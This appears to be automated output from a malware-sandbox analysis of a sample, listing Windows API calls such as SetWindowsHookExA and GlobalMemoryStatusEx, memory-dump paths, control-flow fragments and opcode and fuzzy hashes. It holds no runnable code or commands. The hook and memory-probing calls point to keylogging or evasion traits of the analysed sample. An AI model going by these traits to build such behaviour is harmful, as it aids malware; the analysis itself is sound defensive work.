                                                  control_flow_graph 841 6cba2f0-6cba33a 844 6cba33c-6cba344 841->844 845 6cba346-6cba378 SetWindowsHookExA 841->845 844->845 846 6cba37a-6cba380 845->846 847 6cba381-6cba3a1 845->847 846->847
                                                  APIs
                                                  • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06CBA36B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 69aab0a3c7d55895c8a1b59ff16be3cb3d18869095559c993c100150d5541e8c
                                                  • Instruction ID: 419e6797b14a11649b87a15fc5e934c26fddce9686c18ae82deaac332bb04d87
                                                  • Opcode Fuzzy Hash: 69aab0a3c7d55895c8a1b59ff16be3cb3d18869095559c993c100150d5541e8c
                                                  • Instruction Fuzzy Hash: 842122B1D002499FDB54CF9AC844BEEFBF5FB88720F10842AE459A7250C774A944CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 851 176f1e8-176f25c GlobalMemoryStatusEx 853 176f265-176f28d 851->853 854 176f25e-176f264 851->854 854->853
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0176F24F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4573885582.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_1760000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: b97c44aa73587188297403868c0ff115ddf568beea079d3aa1a8abe1d34affb5
                                                  • Instruction ID: bfaecec9c6b74175fc016c083119c1c12f05fdbb8c0918753067906a862a2367
                                                  • Opcode Fuzzy Hash: b97c44aa73587188297403868c0ff115ddf568beea079d3aa1a8abe1d34affb5
                                                  • Instruction Fuzzy Hash: F91112B1C0465A9FDB10CF9AC444B9EFBF8AF48720F15812AD918B7240D378A944CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 06CB1C96
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 0befb774b37d9fe38bffffe304ac6f6fda3c39923ae63b7f6dac460802067a89
                                                  • Instruction ID: 5872f347d216453197a00688e65c197a1d16ae0c89ced82e950531e13ec27459
                                                  • Opcode Fuzzy Hash: 0befb774b37d9fe38bffffe304ac6f6fda3c39923ae63b7f6dac460802067a89
                                                  • Instruction Fuzzy Hash: 0E1120B5C04349CFCB20DF9AC844ADEFBF4AF89310F24842AD859A7611C375A649CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 06CB1C96
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 4059a5b585c6eea71767a62075b3cd89d8601948df4deebdbb94e0cf2abd29fc
                                                  • Instruction ID: fdbad8866bdfd5c411669e505f493b7de4086eef6555dadacfe54119d95062b9
                                                  • Opcode Fuzzy Hash: 4059a5b585c6eea71767a62075b3cd89d8601948df4deebdbb94e0cf2abd29fc
                                                  • Instruction Fuzzy Hash: FC11FDB6C007498FDB20DF9AC848ADEFBF4AB88210F14842AD919B7610C379A545CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06CB86BD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 5ac0eef3bf27a09a4bea6968410aa2b10c8db8c85c3dc2e35ba85c00273ef47c
                                                  • Instruction ID: 4a6c630123e6e07bc2f7ec23fa2bddda0b9174005ec1dbc4acdc7119b35f6d31
                                                  • Opcode Fuzzy Hash: 5ac0eef3bf27a09a4bea6968410aa2b10c8db8c85c3dc2e35ba85c00273ef47c
                                                  • Instruction Fuzzy Hash: 421122B1800349CFCB20DF9AD489BCEFBF8AB48320F20845AD558A7610C379A544CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CB7D75), ref: 06CB7DFF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 1be772e2ae78d10464b894a404ddd63beba51b7db57eb93aee94a679b87b10d1
                                                  • Instruction ID: ba379b1d54af5b2627450dcbb63ce2be5246eddc99bbfa3e9045a42b5de708cf
                                                  • Opcode Fuzzy Hash: 1be772e2ae78d10464b894a404ddd63beba51b7db57eb93aee94a679b87b10d1
                                                  • Instruction Fuzzy Hash: FE1133B0800349CFDB60DF9AC449BDEBBF4EB88714F20845AD919A7210C375A944CFA5
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 06CB86BD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 8f2b62d77c8d7539a9831ba72e035f0926cd6526d3d96fe034fef2463185b04a
                                                  • Instruction ID: 2059c9c99d620f13e87b23b2ff4fa3487d6241a357dc33e125e5c79d83194abe
                                                  • Opcode Fuzzy Hash: 8f2b62d77c8d7539a9831ba72e035f0926cd6526d3d96fe034fef2463185b04a
                                                  • Instruction Fuzzy Hash: 751145B0800348CFDB20DF9AC449BDEBBF8EB48310F108459D518A7310C378A944CFA5
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06CB7D75), ref: 06CB7DFF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580468184.0000000006CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CB0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cb0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 678b2f8591ef210f7d757f50953569aeeeb8aa4f049123a4e85dcbf3ac6cf1d5
                                                  • Instruction ID: db3c5ab28a897a66e57753206aa7e04f8b62243a0d885a3a3ea875256530f08f
                                                  • Opcode Fuzzy Hash: 678b2f8591ef210f7d757f50953569aeeeb8aa4f049123a4e85dcbf3ac6cf1d5
                                                  • Instruction Fuzzy Hash: BF11F5B1800249CFDB20DF9AD449BDEBBF4AF48714F208419D558A7250C375A944CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2f262f9f9028bae4e36d3779da42c86fb5c79da75d87d2883f2f831079bb9df
                                                  • Instruction ID: 04de680b6ae1ddbcd06ad7d911dbb29f58ffa68b9402e4c0b24df41a24955419
                                                  • Opcode Fuzzy Hash: b2f262f9f9028bae4e36d3779da42c86fb5c79da75d87d2883f2f831079bb9df
                                                  • Instruction Fuzzy Hash: F8623C30A0020A8FDB55EB69E590A9DB7B2FF85710F608A3DD0069F255EB75FD46CB80
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9da2fbde112fbbe5345b540cf1517484f06e95183867145b7377dcddfe27876
                                                  • Instruction ID: 6b572b01f461bee6c216a67d098fefad6bb282a05272c3098b42be80dc88f9c0
                                                  • Opcode Fuzzy Hash: a9da2fbde112fbbe5345b540cf1517484f06e95183867145b7377dcddfe27876
                                                  • Instruction Fuzzy Hash: A6E16F30E1020A8FDF64DBA9D8946AEB7B6FF89314F20852DE405EB345DB349D46CB91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71d4be51b738b78460e4d0864f26d04d11954708efaa7f45591d35d449e137f9
                                                  • Instruction ID: 1ae187f0107bb3329f64381144b2d9e70adf88e383d2670656846b33bcae74a8
                                                  • Opcode Fuzzy Hash: 71d4be51b738b78460e4d0864f26d04d11954708efaa7f45591d35d449e137f9
                                                  • Instruction Fuzzy Hash: 26A19234F101099BEF64CAEDD4917AEB7B6FB89320F64442DE409E7385DA38DD818B61
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11ccf68fd2bd2b84af37173b58243b170d81d15233553a5af285e57201d04289
                                                  • Instruction ID: 880261567e2471e6354ea27a9b5bc5214572eabd7054ff322d73b245de7e8a7e
                                                  • Opcode Fuzzy Hash: 11ccf68fd2bd2b84af37173b58243b170d81d15233553a5af285e57201d04289
                                                  • Instruction Fuzzy Hash: CB914F34B0025A8FDB54DB69D8A0BAE73B2FFC5710F108569C80AAB345EB35ED458B91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1731133291419fa2f059ca43e343a6d4ea15d3f77b7054d85b53ca9fa29cb420
                                                  • Instruction ID: a4b9de17ee4e622944cbea693a20816fb4c2b90f855df99cd85cb7dd92587a5e
                                                  • Opcode Fuzzy Hash: 1731133291419fa2f059ca43e343a6d4ea15d3f77b7054d85b53ca9fa29cb420
                                                  • Instruction Fuzzy Hash: 0461D372F001224BDF50DA7ED99066FBAE7AFC5220B19407DD80ADB364DE65ED0287C1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c6b67915a3558ac09a871e2949d7cad4a367080dae821f2edc5149ac7c092f95
                                                  • Instruction ID: f226c388a47592276a316ad6676b956418a2a9072c07d8a8d2b1705dfd23ce77
                                                  • Opcode Fuzzy Hash: c6b67915a3558ac09a871e2949d7cad4a367080dae821f2edc5149ac7c092f95
                                                  • Instruction Fuzzy Hash: C3814E34B012468BDB58DFA9D4A47AEB7F2AF89314F20C529D40ADB344EB34DD428B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 65c08747142e32db71f9127396145d627fa9f11eb1aa2febb982fdfcacfefc83
                                                  • Instruction ID: 2856cea50e6b2db020eec339aa84c39ef63fa0aeef611f884e4022c41fc56669
                                                  • Opcode Fuzzy Hash: 65c08747142e32db71f9127396145d627fa9f11eb1aa2febb982fdfcacfefc83
                                                  • Instruction Fuzzy Hash: FA814E34B012468BDB58DFA9D4A476EB7F2AFC9314F20C529D40ADB344EB34DD428B91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6051fedefd4d9f7e89c8011c267d9236d68306dd4a8f7af2c0ceacda063b0aaa
                                                  • Instruction ID: e994d43c4d817edeb575387fcde64b8e0dcc2a2d8ee4ba4b67b88bb01842d610
                                                  • Opcode Fuzzy Hash: 6051fedefd4d9f7e89c8011c267d9236d68306dd4a8f7af2c0ceacda063b0aaa
                                                  • Instruction Fuzzy Hash: B3912A30E1061A8BDF64DB68C890B9DB7B1FF89310F20C699D549AB245DB71AA85CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 52a0a52dd52b6771bf34ed5346805e8f31363c8e7b1f2db3908e6c47dc8bec55
                                                  • Instruction ID: dae0e274a1220eff8be05caf30d2e5f7cea0a437ac581495888463c10e341d2f
                                                  • Opcode Fuzzy Hash: 52a0a52dd52b6771bf34ed5346805e8f31363c8e7b1f2db3908e6c47dc8bec55
                                                  • Instruction Fuzzy Hash: E2912A34E1061A8BDF64DF68C890B9DB7B1FF89310F20C699D549AB345DB70AA85CF90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56aa8bfbd6625644b71e70b396b2bb6e98807fd8f5792105fd231577473cdc87
                                                  • Instruction ID: a7564d8a73b76f21b6e06ab68924b74e05a8e0344563c96df9ecb9ece4edf025
                                                  • Opcode Fuzzy Hash: 56aa8bfbd6625644b71e70b396b2bb6e98807fd8f5792105fd231577473cdc87
                                                  • Instruction Fuzzy Hash: 7A713670A002499FDB54DBA9D990AADBBF6FF88310F24842DD415EB355EB30ED46CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 04370b5573e3e54821c1457454d136b423ede548fe9e2780306c0d67561a4036
                                                  • Instruction ID: b7c126555389b28cdb613fcdac5866bf17094ce9cbb781bcb8f3d5896398dd25
                                                  • Opcode Fuzzy Hash: 04370b5573e3e54821c1457454d136b423ede548fe9e2780306c0d67561a4036
                                                  • Instruction Fuzzy Hash: 28713770A002499FDB54DBA9D990AAEBBF6FF88310F24842DD415EB359DB30ED46CB50
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83c44b63561513c020cfc09b0c26d7253edcd98b039a4b4ffb07ceb3856be9a5
                                                  • Instruction ID: 0ae2a4b7443b94289d490281152f4c5f9e689d0b0313fd504886503372a952e6
                                                  • Opcode Fuzzy Hash: 83c44b63561513c020cfc09b0c26d7253edcd98b039a4b4ffb07ceb3856be9a5
                                                  • Instruction Fuzzy Hash: C4619C70E102099FEB58DBA5C8547AEBBF6FF88310F20842EE506AB395DE755C458B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c2604714811550c74f732b4cd85a6f5b48776068f14128ad62cd703e97753c75
                                                  • Instruction ID: c658b70c308b4c27e0fdc3d04ac9690d3b51dac0540910e904685f9d5ced4fcf
                                                  • Opcode Fuzzy Hash: c2604714811550c74f732b4cd85a6f5b48776068f14128ad62cd703e97753c75
                                                  • Instruction Fuzzy Hash: 3A51D031E01105DFDB28AFB8E4946ADB7B3EF84325F20886EE126D7251DB358D55CB80
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f1a8f5e5e7174cee59e93ee85e7370d938b58cb8aca08b4c40a9c30501a05399
                                                  • Instruction ID: 626d6e058d337cc84bba1f0dade136cc1eba1bd16711651c8428ddb069028d40
                                                  • Opcode Fuzzy Hash: f1a8f5e5e7174cee59e93ee85e7370d938b58cb8aca08b4c40a9c30501a05399
                                                  • Instruction Fuzzy Hash: 2251B470B10104CBEF645BB8D864B7E767BDB8A720F20443EE50AD7391C96CCD8187A1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7efabb775a4955796572e4eefd4bb29cab06f51c499344ded321897f545ff1c3
                                                  • Instruction ID: a9645b2e05572a0d5dfacae7a3738d73b3c8a138731841bb5b2c121b3ee0303a
                                                  • Opcode Fuzzy Hash: 7efabb775a4955796572e4eefd4bb29cab06f51c499344ded321897f545ff1c3
                                                  • Instruction Fuzzy Hash: 2E51A270B20104CBEF645BA8D864B7E766BDB8A720F20443EE51AD7391C96CCD9187A2
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ed1b7847093549fac2d2d854033eb09e413e92c81619c1a1bfe43ce7f7685bf
                                                  • Instruction ID: 8f1fa26029cb1d904ccf6e07becf36972bbd19b7d8790ecd304201c8e53f7784
                                                  • Opcode Fuzzy Hash: 5ed1b7847093549fac2d2d854033eb09e413e92c81619c1a1bfe43ce7f7685bf
                                                  • Instruction Fuzzy Hash: F3513E34B011568BEB54DB75D8A0BAE73F2BFC9710F148469C40ADB348EB35DC428B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6846fe52945c80d88ade6de1270a027b4e197c11662cc4b38ce9bf591d3e01d8
                                                  • Instruction ID: 4e2bba39e6df14668678c40ece58a57a7ca49cf8b5c8714b5778e4c6b47191fb
                                                  • Opcode Fuzzy Hash: 6846fe52945c80d88ade6de1270a027b4e197c11662cc4b38ce9bf591d3e01d8
                                                  • Instruction Fuzzy Hash: 8D51BD30A102199FDB58DFE9C854BAEBBF2EF88310F20852DE045AB395DB749C45CB90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3103d1df8b6d577e2309ed74e90b38aebe094a082c4fb828f251c2eaab05ca0c
                                                  • Instruction ID: a44e108303ed2da87451dbdb957a49920079863cebfe643a9cf7495bc27cfe9b
                                                  • Opcode Fuzzy Hash: 3103d1df8b6d577e2309ed74e90b38aebe094a082c4fb828f251c2eaab05ca0c
                                                  • Instruction Fuzzy Hash: 50412A71E006098FDF70CEA9D880AAFF7B2EB95224F50492EE116D7650D730F9658B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e12426d6faba5baab5d46cc9d533794222d62c7940e8e7d40f123aff1ad031b2
                                                  • Instruction ID: 809fe38d4b7e7d41796c88014a22ed2941bff95574249231ec865abf5591fb8a
                                                  • Opcode Fuzzy Hash: e12426d6faba5baab5d46cc9d533794222d62c7940e8e7d40f123aff1ad031b2
                                                  • Instruction Fuzzy Hash: 68418130E0024ADFDB64DF65D4546AEBBB6FF8A750F10442DD405EB240EB75E945CB80
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e097713b659f097eb2ac536d6b34033317aaabef2aced81d9eced889553dd301
                                                  • Instruction ID: 3357d768d643f34e3f8a7d914bec6cc521674502620dcb40b5e6d0d548694fea
                                                  • Opcode Fuzzy Hash: e097713b659f097eb2ac536d6b34033317aaabef2aced81d9eced889553dd301
                                                  • Instruction Fuzzy Hash: B141C330E0025ADFDB65DF65D85469EBBB2FF8A710F20452DD405EB240EB31E946CB80
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e218da549518884f08446cfc4ea23f1b5bfc85e4b871de3324ecd97876d7f4c
                                                  • Instruction ID: 4539f83b06be8b820a10ec6a4ad07a6ce0136aed9c04cab67c4c81afa3433ab4
                                                  • Opcode Fuzzy Hash: 8e218da549518884f08446cfc4ea23f1b5bfc85e4b871de3324ecd97876d7f4c
                                                  • Instruction Fuzzy Hash: 9B312130B102029FDB599B74D4646AE7BB7AF8A760F54446CD402DB385DF39CE42C791
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f8032aba0eaf8c1454326185f1cc85148ae1fd9309a23805f34d6c3363b0695
                                                  • Instruction ID: a98cb3dbecd5349c5cf86a0cd3731402ffa57f33eebfc48e25cf5c6c8133ab31
                                                  • Opcode Fuzzy Hash: 8f8032aba0eaf8c1454326185f1cc85148ae1fd9309a23805f34d6c3363b0695
                                                  • Instruction Fuzzy Hash: A131FE30B102069FDB58AB79D46866E7BA7BFC9760F64442CC402DB384EE39DE41C791
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53b1a38866513ce3f2d01c0f88a5e1e99496ab663f10c0107b0c0a2a1121904c
                                                  • Instruction ID: 77b8d8066b8ac31f889594cf2b0a1804c1e7f53f0a36f2a09a9a751f62518234
                                                  • Opcode Fuzzy Hash: 53b1a38866513ce3f2d01c0f88a5e1e99496ab663f10c0107b0c0a2a1121904c
                                                  • Instruction Fuzzy Hash: D6318330E112459BCB15DFA8D8947AEB7B2BF89310F10892DE905E7340DB75ED42CB40
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e230891159148d2cb713a9ab6aa2467b42d8bd91f270e052d974a0fc955bb91b
                                                  • Instruction ID: 07e04383ae877d129e711415d43056eb75f747386a588badc3bbb274075f4df8
                                                  • Opcode Fuzzy Hash: e230891159148d2cb713a9ab6aa2467b42d8bd91f270e052d974a0fc955bb91b
                                                  • Instruction Fuzzy Hash: 35315030E102499BDB15DFA9D8546AEB7B2FF89710F10892DE906E7350DB75ED41CB80
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_6cc0000_LisectAVT_2403002A_127.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a63447b17040280d6ded3bdb63d4f90a852e2d603b8ddb5753399b45207dd9f5
                                                  • Instruction ID: cf4030c54273de953b6c5ac109a9afdd805555abf7646496956f81cddd89a417
                                                  • Opcode Fuzzy Hash: a63447b17040280d6ded3bdb63d4f90a852e2d603b8ddb5753399b45207dd9f5
                                                  • Instruction Fuzzy Hash: 21219A75F412559FDB50CF69E880AAEBBF1EB88320F108069E909EB350E739DD458B90
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.4580555656.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
